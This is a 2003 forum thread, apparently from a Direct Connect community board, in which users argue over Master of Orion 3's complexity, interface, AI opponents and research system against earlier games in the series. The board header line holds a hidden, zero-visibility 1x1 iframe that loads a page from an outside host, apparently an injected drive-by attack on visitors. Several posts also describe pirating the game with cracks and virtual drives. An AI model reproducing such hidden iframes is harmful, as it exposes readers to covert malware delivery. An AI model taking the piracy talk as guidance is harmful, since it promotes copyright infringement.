Master Of Orion 3

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

[A&AM]Fireball

Master Of Orion 3

Post by [A&AM]Fireball » 2003-02-28 06:01

is out, i recieved my copy 2 days ago :)

all i say is:
go, get it :)

if you likes MoO 1/2 it's a must.

for all others:
16 Races (and you can have 15 AI players !)
LOADS of possibilites
lots of automisation options so you don't have to do everythign yourself ... you won't stand without it, it's just too much stuff *g* :)
learn more about the [A&AM]Hubs: AnimeAndAsianMovies.de.vu

arnetheduck
The Creator Himself

Post by arnetheduck » 2003-02-28 06:56

needs a 3d card or not? Although I love my portable, it does have it's limits, the lack of a 3d card being one...

[A&AM]Fireball

Post by [A&AM]Fireball » 2003-02-28 07:03

minimum is PII 300 *g*
should work smooth even in software mode

Splicer

Post by Splicer » 2003-03-01 08:48

I've heard the game is really complex.

Do you think a person with bad unit management,such as I, would enjoy this game?
"Tomorrow sees undone, what happens not today. Indecision brings delays. Days lost lamenting lost days"

"I’m getting some kind of sick pleasure out of watching her squirm!?!........must be a perk!"

[A&AM]Fireball

Post by [A&AM]Fireball » 2003-03-03 05:28

ah well ... your galaxy can have up to 200 systems with about 4 usable planets each ... :)

lots of stuff can be doen automatically, you don't need to worry about what to research, or build up your colonies since that's done automatically.
you can specify a development plant for each colony so the AI can concentrate in the things important for you.

if you like strategy games and don't mind spending the 1st 3 hours figuring out what you can do *g* it's a must :)

Splicer

Post by Splicer » 2003-03-03 12:50

Cool, thanks.
"Tomorrow sees undone, what happens not today. Indecision brings delays. Days lost lamenting lost days"

"I’m getting some kind of sick pleasure out of watching her squirm!?!........must be a perk!"

Solongastoria

Post by Solongastoria » 2003-03-05 00:41

I'm not to sure about Master of Orion 3 yet.

I downloaded it a few days ago and I'm a big fan of 4x games, Alpha Centauri being my favourite.

Moo3 is a pretty good game..but it's nowhere near as good as moo2. The only improvements are the races and battle system. I'm pleased it didn't try to do anything stupid and 'modern', but it just tried to evolve a game that was already brilliant - If it ain't broken, don't fix it.

If you let your AI do everything you feel distant and there isn't much to do, and if you try to do everything yourself you explode with doing silly tasks. The whole DEA is incredibly annoying, they got rid of the GNN, and they made everything twice as complicated as it had to be.

It's still fun though, just not as good as moo2 (Or even moo1, really). I didn't really expect miracles though. Moo 2 and 1 can be found on the net and DC every now and again, and moo2 is about 10 megs in rip form, play it while you download moo3..

Oh, and a note to those downloading, I used Deamon tools to install the game after downloading both cds (700 and 400 megs) and the game installs on one CD, so I believe the only reason to get the second CD is the crack, which can be found around anyway.

[A&AM]Fireball

Post by [A&AM]Fireball » 2003-03-05 03:38

only problem mith moo2 is that multiplayer isn't playable over LAN ...
combat is freaking slow and they never fixed it ...

and i also miss GNN and those sience breakthrough messages, but moo2 also had it's weak points: seomtimes you just weren't able to invent important thing like doom stars and since this was completely random it was really anoying.
also the improvement in grond combat options is great.

PS: what copy protection ? i did a 1:1 copy ......

arnetheduck
The Creator Himself

Post by arnetheduck » 2003-03-05 06:40

imho this one's not as well balanced as the others...I mean, hell, after spending 10 minutes in the cumbersome and hard-to-work-with shipyard, 5 turns later, which is 10 before you produce the first ship, there's a new tech that obsoletes the one you just built...and the ui is full of bugs, the most annoying one being that you cant change planet with the planet browser if the economy thing with the build queues is up...

Solongastoria

Post by Solongastoria » 2003-03-05 08:44

The research was random, but didn't I read some races can research things that others can't? Isn't that generally the same? I wouldn't really know because I haven't played with more than one race yet, and I don't pay an amazing amount of attention to the technology tree.

As for bugs, it's a modern game, it's obviously going to have thousands, I'd probably be complaining If I had bought it, which is why I tend to stay away from modern games. But it'll be patched a few hundered times.

Without the crack it asks for the disc even when both are in the virtual drives, but D-tools is never too reliable.

Jinker

Post by Jinker » 2003-03-09 18:37

Hey, I actually bought this game and guess what? I like it, and think it's going to take some time to understand the complexities fully. But when you buy a game you usually spend some proper time with your purchase to get your monies worth.
I've noticed several opinions offered by users who didn't purchase the game and are looking for their next fix. Not as good as Moo1 or 2. How many hours playing time was that opinion established over?
Seems to me that the perception of value is generated by the ease in which the requirement can be satisfied.
My Mother used to have a saying "Too many sweeties make you sick!" We live in an age where the threshold of boredom last's less than the satisfaction of discovery.
Wisdom, is knowing when to keep your mouth shut!

DirtyFinger

Post by DirtyFinger » 2003-03-16 17:19

moo3 was the greatest piece of crap that got recently released and the biggest letdown ever.

The userinterface is unsophisticated and extremely unclear.
First, the resolution is stuck to 800x600 and the fonts used are LARGE, thus theres not much info they can put on each screen.
The navigation from one menue to the next is not always clear, sometimes you don't even have a button that allows you to go back.
Sometimes data is shown that can't be manipulated or even visited from the current place.
Example : You want to build a destroyer on a planet of yours instead of a transport, ok ?
Doubleclick on starsystem -> zoom to system view,new menue.
Click on planet -> Window pops up showing stuff including an indicator showing the next 3 things in the building queue. Mind you, you only see 3 ugly icons with no explanation whatsoever what they mean. No tooltip saying that next-in-line is a transport, not a troopship or a frigate(same icon). You can't manipulate the queue here either or access it.
Doubleclick on planet -> Planet menue, clutter with many useless data. No sign of the building queue. No button even saying remotedly where the building queue might be.
Click on some menue (forgot the name. economy or enviroment or something) -> many data you'll never need because you can't really influence it. The building queue ! 3 ugly icons again. no info, no interaction. But theres a button allowing you to change it!
Click button -> Edit the queue. wow. You can now edit the queue and determine the NEXT 3 ITEMS to be built. Moo2 let you specify 10 ! Even better, you can't immedeatly delete an item in production. changes happen in the next turn so you can basically only set 2 items.

Thats 4 steps to change the production (3 if you use a 'shortcut') where Moo2 needed only 2. And you see the bloody queue twice without being able to use it.

The AI is so dumb it would loose in tic-tac-toe if you'd let it place 2 O's beforehand !
It declares war to you, engages in combat when you meet his fleet but nearly never attacks your systems ! And if it does, it doesn't conquer planets because it can't seem to build troopships (although your colony-viceroy turns them out even if you don't want them).
The diplomacy is so fucked up, they sometimes offer you to go to war with them. And you can REFUSE !!!
Or even better, you might receive two messages in the same turn from an alien leader.
Message one : We gladly accept your peace-treaty.
Message two : We have had enough. We are now at WAR !

You can't research technology.
Sure, you can set some sliders determining that you want more research points in biology than in physics or so, but first the AI adjusts your sliders back to normal after a few turns and second, all that happens is that you advance a level in research.
If enough levels are reached, researchable inventions become visible or researchable.
But even when they become researchable you can't choose what to research. The get all researched automatically and you'll get informed in the Situation Report (sitrep) about progress eventually.
At different times in the game you got those messages in the sitrep for each and every tech you research :
Tech blablabla is now visible.
Research on tech blablabla has begun.
Research on tech blablabla is nearly finished.
Research on tech blablabla is finished and we are making a prototype.
The prototype of tech blablabla is finished and we can use the tech now.

And the joke about that is, that you CAN'T use the technology in some instances, e.g. Hydroponic Farms. They just get applied automatically, turning some number from 739 to 744.

Spacecombat. Think Asteroids. Some dots with a yellow pentagon around it. No tactic. Theorhetically you can move them yourself, but why bother ?
The only thing you can accomplish is making thinks worse.
And when ships fire on each other you see how much damage one ship took, but you don't know which one did it. Thus you have absolutely no idea if your new ship-design is good or not.

Ship design is very uncomfortable, too, even though it somewhat resembles that of moo2.

And the different species ?
Nonsense. If in moo2 you immedeatly felt the difference if you race produces +1 industry or -1, you don't feel a thing here, because you never get down to a level where you can actually see what matters. Besides, everything is automated, so after a few turns everything flats out.

Race custumization is cumbersome,too.
Where you could see in moo2 immedeatly what your race can or can't do, strenghts and weaknesses, all traits and racial picks, in moo3 you can't.
No all-in-one view of your traits. Some traits are not even shown at all !!!
Silicoids e.g. don't need food. No mention of that neither in the manual nor in your race statistics.

And the fifth X for experience ?
Well, let me describe how a typical game runs.
Start with one planet, 1 colony ship, 2 scouts.
Set AI to autocolonize.
Send scouts out, colonize a planet or send colony ship out.
Press Next Turn until scouts arrive.
Colonize planet if not done already and send scouts out.
Press Next Turn until scouts arrive and send them away again.
.... repeat about 50 times or so.
---Status : You control about 4 planets in 2 or 3 systems and researche some tech you never looked at.
... about 50 times again.
You meet another alien and start to build a fleet with the current tech. just in case. You do some diplomatics and either make treates or declare war. No big difference, really.
... fast forward 150 turns or so.
---Status : You control about 40 planets in 10 or 20 systems and researche some tech you never looked at. You build a fleet with some new ships and some old ones (because you can't upgrade old ships). You met 5 species, are friends with 3 and war with 1. You ignore the enemy.
... fast forward 150 turns or so.
---Status : You control half the galaxy, feel a bit bored and decide to build a fleet to crush every other race for a challange.
Press Next Turn until warhips arrive and send them away again.
Press Next Turn until warhips arrive and send them away again.
---Status : You control half the galaxy , eliminated 2 species and lost because someone won election in the orion senate you have never seen anywhere in your game.

Thats a huge galaxy with maximum opponents on impossible difficulty.

Anyone here you wants to buy it ?
Neomodus sucks.
The client is terrible.
The hub software is dreadful.
The only thing worse is the protocol.
And then they had to top it by choosing vbs for scripting.
I still marvel at the fact that sharing with Direct Connect turned out so good.

Jinker

Post by Jinker » 2003-03-16 17:49

Well I hope you didn't buy it then? This was never going to be a game for the faint hearted and yes it does take a while to get things moving and yes the diplomacy has it's foibles but as I'm sick to death of FPS and RTS games I thought I'd persevere with MOO3 and see how the game really plays. Having also bought STC3 recently I can tell you this is light years ahead by comparison (pardon the pun).
Wisdom, is knowing when to keep your mouth shut!